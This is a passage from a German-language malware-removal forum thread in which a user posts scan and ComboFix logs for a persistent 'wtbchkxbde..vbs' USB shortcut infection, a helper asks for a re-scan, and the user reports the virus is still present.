2014-04-16 23:59 - 2014-04-16 23:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 23:10 - 2014-04-16 23:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2014-04-16 22:12 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-16 03:44 - 2014-04-16 02:56 - 00000000 ____D () C:\Qoobox
2014-04-16 03:43 - 2009-07-14 05:20 - 00000000 __RHD () C:\Users\Default
2014-04-16 03:35 - 2014-04-16 02:56 - 00000000 ____D () C:\Windows\erdnt
2014-04-16 03:15 - 2009-07-14 04:34 - 00000215 _____ () C:\Windows\system.ini
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-16 02:48 - 2014-04-16 02:47 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups
2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 ____D () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-03 09:51 - 2014-04-16 23:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-04-03 09:51 - 2014-04-16 23:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-04-03 09:50 - 2014-04-16 23:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos
2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001
2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache

Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\avgnt.exe
C:\Users\Franz\AppData\Local\Temp\Quarantine.exe


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit


LastRegBack: 2014-03-24 00:49

==================== End Of Log ============================
         
--- --- ---

Alt 20.04.2014, 19:18   #14
schrauber
/// the machine
/// TB-Ausbilder
 

Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



Combofix bitte löschen und neu laden, nochmal laufen lassen und das Logfile posten.
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Alt 21.04.2014, 01:46   #15
fxak
 
Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



Combofx-Logfile:

Code:
ATTFilter
ComboFix 14-04-20.01 - Franz 21.04.2014   1:06.2.4 - x64
Microsoft Windows 7 Home Premium   6.1.7600.0.1252.49.1031.18.3764.2038 [GMT 2:00]
ausgeführt von:: c:\users\Franz\Desktop\ComboFix.exe
AV: Avira Desktop *Disabled/Outdated* {4D041356-F94D-285F-8768-AAE50FA36859}
SP: Avira Desktop *Disabled/Outdated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((   Dateien erstellt von 2014-03-20 bis 2014-04-20  ))))))))))))))))))))))))))))))
.
.
2014-04-20 23:20 . 2014-04-20 23:20	--------	d-----w-	c:\users\Default\AppData\Local\temp
2014-04-18 21:16 . 2013-09-22 15:47	73266	----a-w-	c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-04-18 21:14 . 2013-09-22 15:47	73266	----a-w-	c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
2014-04-16 21:46 . 2014-04-16 21:46	--------	d-----w-	c:\windows\ERUNT
2014-04-16 21:07 . 2014-04-16 21:10	119512	----a-w-	c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-04-16 21:06 . 2014-04-16 21:06	--------	d-----w-	c:\program files (x86)\ Malwarebytes Anti-Malware 
2014-04-16 21:06 . 2014-04-16 21:06	--------	d-----w-	c:\programdata\Malwarebytes
2014-04-16 21:06 . 2014-04-03 07:51	63192	----a-w-	c:\windows\system32\drivers\mwac.sys
2014-04-16 21:06 . 2014-04-03 07:51	88280	----a-w-	c:\windows\system32\drivers\mbamchameleon.sys
2014-04-16 21:06 . 2014-04-03 07:50	25816	----a-w-	c:\windows\system32\drivers\mbam.sys
2014-04-16 21:06 . 2014-04-16 21:06	--------	d-----w-	c:\users\Franz\AppData\Local\Programs
2014-04-16 00:52 . 2014-04-16 00:52	--------	d-----w-	c:\programdata\Panda Security
2014-04-16 00:52 . 2014-04-16 00:52	--------	d-----w-	c:\program files (x86)\Panda USB Vaccine
2014-04-14 08:43 . 2014-04-20 03:21	--------	d-----w-	C:\FRST
2014-04-07 07:32 . 2014-04-09 08:19	--------	d-----w-	C:\[Smad-Cage]
2014-04-07 07:30 . 2014-04-07 07:30	--------	d-----w-	c:\programdata\Kaspersky Lab Setup Files
2014-04-02 06:19 . 2014-04-02 06:54	--------	d-----w-	c:\users\Franz\AppData\Local\NPE
2014-04-02 06:19 . 2014-04-02 06:19	--------	d-----w-	c:\programdata\Norton
2014-03-25 07:40 . 2014-03-25 07:40	--------	d-----w-	C:\found.001
.
.
.
((((((((((((((((((((((((((((((((((((   Find3M Bericht   ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-04 12:17 . 2012-07-17 13:37	22240	----a-w-	c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
((((((((((((((((((((((((((((   Autostartpunkte der Registrierung   ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetLimiter"="c:\program files\NetLimiter 3\NLClientApp.exe" [2011-03-21 2910208]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"BackupManagerTray"="c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe" [2010-03-08 260608]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-04-21 98304]
"LManager"="c:\program files (x86)\Launch Manager\LManager.exe" [2010-05-26 960080]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-02-12 43848]
"avgnt"="c:\program files (x86)\Avira\AntiVir Desktop\avgnt.exe" [2014-02-20 689744]
"HP Software Update"="c:\program files (x86)\Hp\HP Software Update\HPWuSchd2.exe" [2011-10-28 49208]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-02-21 152392]
.
c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
wtbchkxbde..vbs [2013-9-22 73266]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Acer VCM.lnk - c:\program files (x86)\Acer\Acer VCM\AcerVCM.exe [2013-4-16 704032]
VR-NetWorld Auftragsprüfung.lnk - c:\program files (x86)\VR-NetWorld\vrtoolcheckorder.exe /autostart [2014-1-9 1137664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 AmUStor;AM USB Stroage Driver;c:\windows\system32\drivers\AmUStor.SYS;c:\windows\SYSNATIVE\drivers\AmUStor.SYS [x]
R3 AthBTPort;Atheros Virtual Bluetooth Class;c:\windows\system32\DRIVERS\btath_flt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_flt.sys [x]
R3 ATHDFU;Atheros Valkyrie USB BootROM;c:\windows\system32\Drivers\AthDfu.sys;c:\windows\SYSNATIVE\Drivers\AthDfu.sys [x]
R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;c:\windows\system32\drivers\btath_a2dp.sys;c:\windows\SYSNATIVE\drivers\btath_a2dp.sys [x]
R3 BTATH_HCRP;Bluetooth HCRP Server driver;c:\windows\system32\DRIVERS\btath_hcrp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_hcrp.sys [x]
R3 BTATH_LWFLT;Bluetooth LWFLT Device;c:\windows\system32\DRIVERS\btath_lwflt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_lwflt.sys [x]
R3 BTATH_RCP;Bluetooth AVRCP Device;c:\windows\system32\DRIVERS\btath_rcp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_rcp.sys [x]
R3 BtFilter;BtFilter;c:\windows\system32\DRIVERS\btfilter.sys;c:\windows\SYSNATIVE\DRIVERS\btfilter.sys [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 NLNdisPT;NetLimiter Ndis Protocol Service;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 WatAdminSvc;Windows-Aktivierungstechnologieservice;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S1 avkmgr;avkmgr;c:\windows\system32\DRIVERS\avkmgr.sys;c:\windows\SYSNATIVE\DRIVERS\avkmgr.sys [x]
S1 nltdi;nltdi;c:\program files\NetLimiter 3\nltdi.sys;c:\program files\NetLimiter 3\nltdi.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 AntiVirSchedulerService;Avira Planer;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe [x]
S2 AtherosSvc;AtherosSvc;c:\program files (x86)\Bluetooth Suite\adminservice.exe;c:\program files (x86)\Bluetooth Suite\adminservice.exe [x]
S2 DsiWMIService;Dritek WMI Service;c:\program files (x86)\Launch Manager\dsiwmis.exe;c:\program files (x86)\Launch Manager\dsiwmis.exe [x]
S2 ePowerSvc;Acer ePower Service;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [x]
S2 NTI IScheduleSvc;NTI IScheduleSvc;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [x]
S2 RS_Service;Raw Socket Service;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe [x]
S2 UNS;Intel(R) Management & Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S2 Updater Service;Updater Service;c:\program files\Acer\Acer Updater\UpdaterService.exe;c:\program files\Acer\Acer Updater\UpdaterService.exe [x]
S3 BTATH_BUS;Atheros Bluetooth Bus;c:\windows\system32\DRIVERS\btath_bus.sys;c:\windows\SYSNATIVE\DRIVERS\btath_bus.sys [x]
S3 HECIx64;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECIx64.sys;c:\windows\SYSNATIVE\DRIVERS\HECIx64.sys [x]
S3 intelkmd;intelkmd;c:\windows\system32\DRIVERS\igdpmd64.sys;c:\windows\SYSNATIVE\DRIVERS\igdpmd64.sys [x]
S3 L1C;NDIS Miniport Driver for Atheros AR813x/AR815x PCI-E Ethernet Controller;c:\windows\system32\DRIVERS\L1C62x64.sys;c:\windows\SYSNATIVE\DRIVERS\L1C62x64.sys [x]
S3 NLNdisMP;NLNdisMP;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
S3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
.
.
--- Andere Dienste/Treiber im Speicher ---
.
*NewlyCreated* - CDFS
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-04-02 06:02	1150280	----a-w-	c:\program files (x86)\Google\Chrome\Application\33.0.1750.154\Installer\chrmstp.exe
.
Inhalt des "geplante Tasks" Ordners
.
2014-04-20 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
2014-04-20 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AmIcoSinglun64"="c:\program files (x86)\AmIcoSingLun\AmIcoSinglun64.exe" [2009-09-22 323584]
"mwlDaemon"="c:\program files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe" [BU]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2010-04-21 166424]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2010-04-21 391192]
"Persistence"="c:\windows\system32\igfxpers.exe" [2010-04-21 413720]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-20 9996320]
"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2010-01-20 877600]
"AtherosBtStack"="c:\program files (x86)\Bluetooth Suite\BtvStack.exe" [2010-05-25 585376]
"AthBtTray"="c:\program files (x86)\Bluetooth Suite\AthBtTray.exe" [2010-05-25 354464]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2010-03-09 345648]
"Acer ePower Management"="c:\program files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe" [2010-02-02 496160]
"BCSSync"="c:\program files\Microsoft Office\Office14\BCSSync.exe" [2012-11-05 108144]
"wtbchkxbde"="wscript.exe" [2009-07-14 168960]
.
------- Zusätzlicher Suchlauf -------
.
uStart Page = hxxp://www.google.com.ph/intl/en/
uLocal Page = c:\windows\system32\blank.htm
mDefault_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mStart Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: An OneNote s&enden - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
IE: Nach Microsoft E&xcel exportieren - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
TCP: DhcpNameServer = 172.20.10.1
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
.
.
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10e.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10e.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Zeit der Fertigstellung: 2014-04-21  01:41:59
ComboFix-quarantined-files.txt  2014-04-20 23:41
.
Vor Suchlauf: 23 Verzeichnis(se), 32.543.174.656 Bytes frei
Nach Suchlauf: 24 Verzeichnis(se), 32.351.719.424 Bytes frei
.
- - End Of File - - 5DF84863D0CA34F0EF60B76EAB81F85C
         
Virus ist nach wie vor da

Geändert von fxak (21.04.2014 um 01:52 Uhr)

Antwort

Themen zu Flash Drive Shortcut Virus wtbchkxbde..vbs
acer, acer aspire, antivirus, avira, dateien, desktop, detected, entfernen, folge, formatieren, frage, geld, google, hängt, laptop hängt, launch, link, links auf usb-stick, logfiles, lösung, microsoft, online, problem, programme, shortcut virus, software, system32, versteckte dateien, virus, windows, zufällig



Ähnliche Themen: Flash Drive Shortcut Virus wtbchkxbde..vbs


  1. Windows 8: Ordner werden als shortcut angezeigt, tlw. auch USB-Sticks
    Log-Analyse und Auswertung - 30.05.2015 (21)
  2. Virus durch Flash Player
    Alles rund um Windows - 06.05.2015 (1)
  3. Adope Flash Virus/Malware
    Plagegeister aller Art und deren Bekämpfung - 28.03.2015 (14)
  4. Flash Beat Virus
    Plagegeister aller Art und deren Bekämpfung - 08.02.2015 (5)
  5. java/flash virus
    Plagegeister aller Art und deren Bekämpfung - 10.11.2014 (3)
  6. Win 7 - Paypal Mail erhalten - Kaspersky meldet hao123 desktop shortcut
    Log-Analyse und Auswertung - 04.08.2014 (14)
  7. Flash Player Update Virus
    Log-Analyse und Auswertung - 11.06.2014 (3)
  8. http://search.certified-toolbar.com/?si=41460&st=shortcut&tid=3192 und andere Probleme
    Mülltonne - 26.01.2013 (3)
  9. Startfenster.com nach Flash / Shockwave Update, Flash Plugin stürzt dauernd ab
    Log-Analyse und Auswertung - 26.09.2012 (41)
  10. Usb stick & sd karte zeigen nur noch verknüpfungen an (shortcut)
    Log-Analyse und Auswertung - 19.02.2012 (3)
  11. Virus durch Flash gefangen?
    Log-Analyse und Auswertung - 08.12.2011 (40)
  12. Ordner als shortcut angezeigt auf ein usb external hd
    Plagegeister aller Art und deren Bekämpfung - 30.11.2011 (9)
  13. Copy to shortcut
    Log-Analyse und Auswertung - 19.06.2011 (1)
  14. Flash-Cookies im Griff: Adobe veröffentlicht Flash 10.3
    Nachrichten - 13.05.2011 (0)
